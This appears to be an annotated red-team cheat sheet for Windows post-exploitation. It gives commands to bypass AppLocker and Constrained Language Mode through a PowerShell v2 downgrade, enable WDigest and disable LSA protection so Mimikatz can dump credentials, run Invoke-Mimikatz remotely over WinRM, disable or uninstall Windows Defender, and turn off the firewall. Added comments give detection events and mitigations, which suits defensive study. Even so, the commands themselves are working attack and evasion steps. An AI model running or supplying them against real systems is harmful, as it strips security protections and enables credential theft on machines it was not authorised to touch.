This app has been blocked by your system administrator !!!

CHECK WHERE YOU CAN DROP YOUR BINARY

# Read-only: lists the effective AppLocker rule collections (the merge of local and domain policy) on this host;
# `select` is the Select-Object alias. Defenders can run the same query to confirm which path/publisher/hash
# rules are actually in force rather than what the GPO is believed to set.
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

CHECK POWERSHELL LANGUAGE MODE

# Read-only: prints the session's PSLanguageMode (FullLanguage, ConstrainedLanguage, RestrictedLanguage or NoLanguage).
# A host with WDAC/AppLocker script enforcement should typically report ConstrainedLanguage for unsigned scripts.
$ExecutionContext.SessionState.LanguageMode

POWERSHELL VERSION DOWNGRADE

# CHECK IF OLD VERSION STILL ACTIVATED
# Queries whether the legacy PowerShell 2.0 engine (optional feature MicrosoftWindowsPowerShellV2) is still installed.
Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
# ABUSE
# Starting the 2.0 engine sidesteps Constrained Language Mode and script block logging, which only exist in
# PowerShell 3.0+ and 5.0+ respectively. Mitigation: remove the feature
# (Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2).
# Detection: process-creation events where the powershell.exe command line carries "-version 2".
powershell.exe -version 2.0
Constrained Language Mode was introduced in PowerShell 3.0, so if the PowerShell 2.0 engine is still installed an attacker can bypass it simply by launching the older version.

CHANGE LANGUAGE MODE


MIMIKATZ ERROR kuhl_m_privilege_simple

# NEED SeDebugPrivilege
# Group Policy Management Editor -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment -> Debug programs -> Define these policy settings

MIMIKATZ ERROR kuhl_m_sekurlsa_acquireLSA

# ENABLE WDigest
# UseLogonCredential=1 makes LSASS keep a reversible copy of logon credentials in memory; it affects logons made
# after the value is set. On Windows 8.1/2012 R2 and later the value is absent (defaults to 0), so any write to it
# is a high-fidelity tamper indicator — audit this key (registry SACL or Sysmon Event ID 13) and alert on it.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

MIMIKATZ ERROR kuhl_m_sekurlsa_acquireLSA

# DISABLE LSA Protection
# Sets RunAsPPL=0 so LSASS no longer runs as a protected process. Needs admin rights and only takes effect after a
# reboot; where LSA protection is UEFI-locked the registry change alone is not honoured. Defensive counterpart:
# keep RunAsPPL=1 (UEFI-locked where possible) and audit writes to this value the same way as the WDigest key.
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0

MIMIKATZ ERROR kuhl_m_lsadump_secretsOrCache

# Computer Configuration -> Windows Settings -> Local Policy -> Security Options -> Interactive Logon: Number of previous logons to cache -> 10

Disable AMSI

# LOCAL
# NOTE(review): -DisableIOAVProtection turns off Defender's scanning of downloaded files and attachments (IOAV);
# it does not disable the AMSI interface itself, so the "Disable AMSI" heading looks mislabelled — confirm intent.
# On hosts with Tamper Protection enabled this preference change is typically ignored.
Set-MpPreference -DisableIOAVProtection $true
# Remote
# Opens a PS Remoting (WinRM) session to websrv.domain.local and applies the same preference there. Each
# Invoke-Command run is visible to defenders through WinRM logon activity on the target and, with script block
# logging enabled, Event ID 4104 in Microsoft-Windows-PowerShell/Operational.
$sess = New-PSSession -ComputerName websrv.domain.local
Invoke-command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess
# REMOTE MIMIKATZ
# ${function:Invoke-Mimikatz} assumes the Invoke-Mimikatz function is already loaded in the local session (it is
# not defined on this page); its body is sent over the session as the script block, so it is also logged as above.
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

DISABLE WINDOWS DEFENDER

# Turns off Defender real-time scanning; requires admin. With Tamper Protection enabled (the norm on managed
# Windows 10/11 hosts) the change is blocked, so the setting is both a mitigation and a detection point:
# Microsoft-Windows-Windows Defender/Operational Event ID 5001 records real-time protection being disabled.
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

REMOVE WINDOWS DEFENDER

# Removes the Windows Defender feature entirely. Uninstall-WindowsFeature comes from the ServerManager module, so
# this applies to Windows Server, not client SKUs; it needs admin rights and usually a reboot to complete.
# A server whose Defender feature disappears should trip inventory/compliance checks.
Uninstall-WindowsFeature -Name Windows-Defender

DISABLE FIREWALL

# Disables the host firewall on all three profiles; requires admin. Profile changes are logged under
# Microsoft-Windows-Windows Firewall With Advanced Security/Firewall (e.g. Event ID 2003) and are a standard alert trigger.
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
# Re-enables every profile — the counterpart of the line above, used to restore the host after testing.
Set-NetFirewallProfile -Profile * -Enabled True